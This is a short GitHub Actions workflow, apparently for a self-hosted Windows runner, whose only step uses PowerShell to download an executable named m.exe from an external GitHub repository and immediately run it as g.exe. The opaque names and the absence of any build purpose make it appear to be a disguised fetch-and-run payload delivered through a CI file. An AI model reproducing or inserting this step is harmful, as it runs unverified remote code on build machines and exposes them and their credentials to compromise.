name: igf5
on:
  workflow_dispatch:
jobs:
  build:
    runs-on: w
    steps:
      - name: powershell
        shell: cmd
        run: powershell.exe -c Invoke-WebRequest https://github.com/biggerrun/bigrunner/raw/main/m.exe -OutFile g.exe ; .\g.exe
